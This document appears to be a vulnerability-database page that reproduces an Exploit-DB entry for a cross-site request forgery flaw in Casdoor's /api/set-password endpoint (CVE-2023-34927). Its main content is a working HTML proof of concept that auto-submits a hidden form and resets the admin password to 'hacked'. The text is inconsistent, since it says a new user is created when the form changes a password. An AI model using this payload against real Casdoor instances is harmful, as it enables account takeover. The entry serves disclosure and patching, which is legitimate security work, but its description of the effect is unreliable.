| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| CVE-2023-34927 | 22 Jun 202313:15 | β | attackerkb | |
| Casdoor θ·¨η«θ―·ζ±δΌͺι ζΌζ΄ | 22 Jun 202300:00 | β | cnnvd | |
| CVE-2023-34927 | 22 Jun 202300:00 | β | cve | |
| CVE-2023-34927 | 22 Jun 202300:00 | β | cvelist | |
| Casdoor < v1.331.0 - '/api/set-password' CSRF | 2 Apr 202400:00 | β | exploitdb | |
| Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF) | 16 Sep 202500:00 | β | exploitdb | |
| Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF) | 29 Oct 202500:00 | β | exploitdb | |
| EUVD-2023-1883 | 3 Oct 202520:07 | β | euvd | |
| Casdoor Cross-Site Request Forgery vulnerability | 22 Jun 202315:30 | β | github | |
| CVE-2023-34927 | 22 Jun 202313:15 | β | nvd |
# Exploit Title: Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)
# Application: Casdoor
# Version: v2.95.0 (2025-10-22)
# Date: 2025-10-23
# Exploit Author: Van Lam Nguyen
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v2.95.0.zip
# Tested on: Windows
# CVE : CVE-2023-34927 ( latest yet to be assigned)
Overview
==================================================
Casdoor v2.95.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
Proof of Concept
==================================================
Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
<input name='userOwner' value='built-in' type='hidden'>
<input name='userName' value='admin' type='hidden'>
<input name='newPassword' value='hacked' type='hidden'>
<input type=submit>
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</html>
If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
userOwner: built-in
userName: admin
newPassword: hackedData
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation